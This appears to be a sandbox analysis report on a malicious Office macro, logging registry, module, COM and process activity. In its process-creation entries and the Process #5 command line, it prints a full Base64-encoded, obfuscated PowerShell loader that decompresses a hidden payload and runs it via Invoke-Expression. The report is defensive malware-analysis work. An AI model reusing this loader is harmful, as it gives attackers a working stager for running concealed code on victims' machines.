| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| System | Get Time | type = Local Time, time = 2019-04-14 14:37:04 (Local Time) |
|
2 | |
| System | Get Time | type = Local Time, time = 2019-04-14 14:37:05 (Local Time) |
|
1 | |
| System | Get Cursor | x_out = 1328, y_out = 694 |
|
1 | |
| System | Get Time | type = Local Time, time = 2019-04-14 14:37:05 (Local Time) |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| System | Get Time | type = Local Time, time = 2019-04-14 14:37:05 (Local Time) |
|
1 | |
| System | Get Cursor | x_out = 1328, y_out = 694 |
|
1 | |
| System | Get Time | type = Local Time, time = 2019-04-14 14:37:05 (Local Time) |
|
2 | |
| System | Get Time | type = Local Time, time = 2019-04-14 14:37:05 (Local Time) |
|
4 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = VbaCapability, data = 216 |
|
1 | |
| System | Get Time | type = Local Time, time = 2019-04-14 14:37:05 (Local Time) |
|
2 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 573, address_out = 0x7fee38eafec |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 575, address_out = 0x7fee38eb100 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 584, address_out = 0x7fee3a93440 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 614, address_out = 0x7fee3a93304 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 626, address_out = 0x7fee3ac2a80 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-14 14:37:07 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 136547 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 19480767813 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Impersonation Level, data = 3 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Module | Load | module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = DuplicateTokenEx, address_out = 0x7fefd71d310 |
|
1 | |
| COM | Create | interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| COM | Create | interface = 3BC15AF2-736C-477E-9E51-238AF8667DCC, cls_context = CLSCTX_INPROC_SERVER |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace, data = 114 |
|
1 | |
| COM | Create | interface = 3BC15AF2-736C-477E-9E51-238AF8667DCC, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| COM | Create | interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| COM | Create | interface = 3BC15AF2-736C-477E-9E51-238AF8667DCC, cls_context = CLSCTX_INPROC_SERVER |
|
2 | |
| Process | Create | process_name = powershell -e KAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIAAgAGkATwAuAHMAVABSAEUAYQBNAFIAZQBhAGQAZQBSACgAKAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIABJAE8ALgBjAG8AbQBwAHIARQBTAHMAaQBPAE4ALgBEAEUAZgBsAGEAVABFAHMAdAByAGUAYQBNACgAIABbAGkAbwAuAG0ARQBNAG8AUgBZAFMAdAByAGUAYQBNAF0AIABbAEMAbwBuAFYAZQByAFQAXQA6ADoAZgBSAE8ATQBCAEEAcwBlADYANABzAFQAcgBJAE4AZwAoACgAJwBYAFoASgBSAGIANQBzACcAKwAnAHcAJwArACcARQAnACsAJwBNAGUALwAnACsAJwBDAGcAJwArACcAOQBJAFQAcABRAEIAaQA4AFIARABWACcAKwAnADQAJwArACcAVABVAGMAMQBoAFEAWAAnACsAJwByAGEAaABGACcAKwAnAFEAVwBoACcAKwAnAFMAaABWAHgARABuACcAKwAnAEMAZwBOACcAKwAnAHMAJwArACcASQBPACcAKwAnAHoAaAAnACsAJwBUAGwAdQAnACsAJwA4AC8AWgAyAGsAYQB0ACcAKwAnAEgANgAnACsAJwAzAGYALwBjAC8AMwBPACcAKwAnADcAJwArACcAdgAnACsAJwBWAGMAJwArACcANQBkAEIAJwArACcAQQBtACcAKwAnAEYATQB1ACcAKwAnAGkAVgBBAGIAcQBBAGoAawAnACsAJwBUAHQAJwArACcAawBZAEUANABRAEMAegBTAGUAMwBCADIAUQBhAGUAYwBIAGEAbgArAEwAdQAxAFgAUABVAGUAagAnACsAJwBJAEwAUgBpAEYAegAnACsAJwBCAEsAawAxAFgAcQAnACsAJwA0ACcAKwAnAEQANAAnACsAJwBJACcAKwAnAGUAbABjACcAKwAnAEsAeABVAGsAJwArACcAbwB5AFgAbQBsAFUAUABwAE0AJwArACcAdgBnAFIAJwArACcAawA4ACcAKwAnAEoAbwBXADIAJwArACcAQgAnACsAJwBjAEgAMwB1AHoAJwArACcAWgAnACsAJwA0AGUARwBWACcAKwAnAHIAJwArACcATwBlAEoAcAAnACsAJwBHAEsAVQB0AG0ARABqAEQAegA2AGoAZQB2AHAATwBDACcAKwAnADQAOQAnACsAJwBHACcAKwAnADAAcwB0AGIAWQBZAEcAOQB3ACcAKwAnADcARgBEADQAbwBnACcAKwAnACsAYQBiAHgAQgBzAEQALwA4ACcAKwAnAHAAWgBiAEcAJwArACcAagAnACsAJwA0AEUASwBPACcAKwAnAEcAdgAnACsAJwBkACcAKwAnADgAdwBsACcAKwAnAEgASgBmADQARwBWAFUAYgByAFMAaQB0AHQAVQAnACsAJwBGAFcAJwArACcAUwBQAEwAJwArACcAYgB2AGgARQAyACcAKwAnAC8AJwArACcAawA2ACcAKwAnAE8AMwBIAHEAcABIAGkAYwAnACsAJwAvAFAAZAA1AG0AJwArACcAZABBAC8ATgA5AEQAegAvAFcATQBQAEoAQgA1ACcAKwAnADUATgBiADUAOABqAGwAUABZADMASwAnACsAJwBnAFkASgBLAFMAVwBqACcAKwAnAG0AeQBLADIAJwArACcAawBLAFcAZQAnACsAJwBqAEUARAAnACsAJwBnAG4AdgA3ACcAKwAnAEUAVQB1AE8AMQBwAFEASwBHAE8AUwAnACsAJwBXACcAKwAnAHAAJwArACcATQAwAFMAYQA0ACcAKwAnAEsAJwArACcAZgAnACsAJwB3AEcAcwBBAEoATAAnACsAJwBZAFIAVABIAGQASAArADIAcwBkAHUASwBhACcAKwAnADkANwBnAGcAVAAyAFQAeABuAHIARQBnAFAAcAAnACsAJwA2ACcAKwAnAFEAUgBGAGMAbgBGAFcAdABuACcAKwAnADcAJwArACcAcgBwAFkAbgBvAEIAbQBoAGMATwBGADgAJwArACcAMgBaACcAKwAnADUAZgB0ACcAKwAnAGIAagBuAC8AUAByACcAKwAnAFUAdgB4AEUARwB0ACcAKwAnAEgATABhAHIAJwArACcAKwAyACcAKwAnAFkAVABmACcAKwAnACsAJwArACcAaQAnACsAJwAvAFAAVwAwAGIANQAnACsAJwA1AEQAVwAnACsAJwBYAEcAawBqAHcAJwArACcAbQBEAEYASwBnAGUAVgBHAFEAYQBGAE0AJwArACcANwBzADEAbQBLACcAKwAnADIAdAB0AG8AZgBMAG0AeAAnACsAJwBmAG8AJwArACcAKwBpACcAKwAnADAAYQAzAGoATgBlACcAKwAnAGkARQBYACsAJwArACcAMgBaACcAKwAnAE8AKwBlAE4AbQBHAFMASABIADAARwA3AGMAVABBAGgAbQBKACcAKwAnAGgAVQBLACcAKwAnAFEARABRAGsAawBRADcAKwArAEkAdQB1AGwAeABZAHAAVgBsADcAdgBsAHoAYwBSADYAQwAwAHMAJwArACcANgAnACsAJwBaAFcAawBGADkALwBGAEkAbgArAEEAJwArACcAZwA9AD0AJwApACAAKQAsAFsASQBvAC4AYwBvAG0AUABSAGUAUwBTAGkAbwBuAC4AYwBPAE0AUABSAGUAcwBzAGkATwBOAE0AbwBEAEUAXQA6ADoAZABFAGMAbwBNAHAAUgBFAFMAcwAgACkAIAApACAALABbAHQAZQBYAHQALgBlAG4AQwBPAGQASQBOAEcAXQA6ADoAYQBTAEMAaQBpACkAKQAuAHIARQBhAGQAVABPAEUAbgBkACgAIAApACAAfAAmACgAIAAkAFYARQByAEIATwBTAEUAcAByAGUARgBFAFIAZQBOAGMAZQAuAHQATwBTAFQAcgBpAE4ARwAoACkAWwAxACwAMwBdACsAJwBYACcALQBqAG8ASQBuACcAJwApAA== |
|
1 | |
| System | Get Cursor | x_out = 630, y_out = 293 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 573, address_out = 0x7fee38eafec |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 575, address_out = 0x7fee38eb100 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 584, address_out = 0x7fee3a93440 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 614, address_out = 0x7fee3a93304 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 626, address_out = 0x7fee3ac2a80 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 573, address_out = 0x7fee38eafec |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 575, address_out = 0x7fee38eb100 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 584, address_out = 0x7fee3a93440 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 614, address_out = 0x7fee3a93304 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee3780000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll, function = 626, address_out = 0x7fee3ac2a80 |
|
1 |
Process #2: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:02, Reason: RPC Server |
| Unmonitor | End Time: 00:04:56, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:54 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x370 |
| Parent PID | 0x1cc (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
A4C
0x
A48
0x
A40
0x
A3C
0x
A38
0x
A34
0x
A30
0x
A2C
0x
A28
0x
A10
0x
5C8
0x
414
0x
230
0x
408
0x
7DC
0x
798
0x
794
0x
764
0x
760
0x
758
0x
730
0x
728
0x
724
0x
71C
0x
70C
0x
700
0x
6FC
0x
6F8
0x
6E4
0x
4C0
0x
480
0x
474
0x
470
0x
450
0x
444
0x
294
0x
218
0x
3FC
0x
3F4
0x
3E8
0x
39C
0x
390
0x
38C
0x
388
0x
37C
0x
374
0x
AC4
0x
AD0
0x
AD4
0x
AD8
0x
B00
0x
B5C
0x
B88
0x
B8C
0x
BBC
0x
BC0
0x
BC4
0x
BC8
0x
BCC
0x
BD0
0x
BD4
0x
BD8
0x
BEC
0x
80C
0x
894
0x
330
0x
70C
0x
71C
0x
77C
0x
B38
0x
310
0x
60C
0x
4B4
0x
6A8
0x
BC8
0x
BC4
|
Process #4: wmiprvse.exe
0
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\wbem\wmiprvse.exe |
| Command Line | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:10, Reason: RPC Server |
| Unmonitor | End Time: 00:04:15, Reason: Self Terminated |
| Monitor Duration | 00:03:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xadc |
| Parent PID | 0x254 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AE0
0x
AE4
0x
AE8
0x
AEC
0x
AF0
0x
AF4
0x
AF8
0x
AFC
0x
500
0x
5BC
0x
5C8
|
Process #5: powershell.exe
742
224
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | Truncated command line: powershell -e KAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIAAgAGkATwAuAHMAVABSAEUAYQBNAFIAZQBhAGQAZQBSACgAKAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIABJAE8ALgBjAG8AbQBwAHIARQBTAHMAaQBPAE4ALgBEAEUAZgBsAGEAVABFAHMAdAByAGUAYQBNACgAIABbAGkAbwAuAG0ARQBNAG8AUgBZAFMAdAByAGUAYQBNAF0AIABbAEMAbwBuAFYAZQByAFQAXQA6ADoAZgBSAE8ATQBCAEEAcwBlADYANABzAFQAcgBJAE4AZwAoACgAJwBYAFoASgBSAGIANQBzACcAKwAnAHcAJwArACcARQAnACsAJwBNAGUALwAnACsAJwBDAGcAJwArACcAOQBJAFQAcABRAEIAaQA4AFIARABWACcAKwAnADQAJwArACcAVABVAGMAMQBoAFEAWAAnACsAJwByAGEAaABGACcAKwAnAFEAVwBoACcAKwAnAFMAaABWAHgARABuACcAKwAnAEMAZwBOACcAKwAnAHMAJwArACcASQBPACcAKwAnAHoAaAAnACsAJwBUAGwAdQAnACsAJwA4AC8AWgAyAGsAYQB0ACcAKwAnAEgANgAnACsAJwAzAGYALwBjAC8AMwBPACcAKwAnADcAJwArACcAdgAnACsAJwBWAGMAJwArACcANQBkAEIAJwArACcAQQBtACcAKwAnAEYATQB1ACcAKwAnAGkAVgBBAGIAcQBBAGoAawAnACsAJwBUAHQAJw... |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:11, Reason: Child Process |
| Unmonitor | End Time: 00:01:38, Reason: Self Terminated |
| Monitor Duration | 00:00:26 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb08 |
| Parent PID | 0xadc (c:\windows\system32\wbem\wmiprvse.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B0C
0x
B4C
0x
B50
0x
B58
0x
B6C
0x
B70
0x
B90
0x
B94
0x
B98
0x
B9C
0x
114
0x
880
|
Threads
Thread 0xb0c
548
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
14 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 436 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 |
|
1 | |
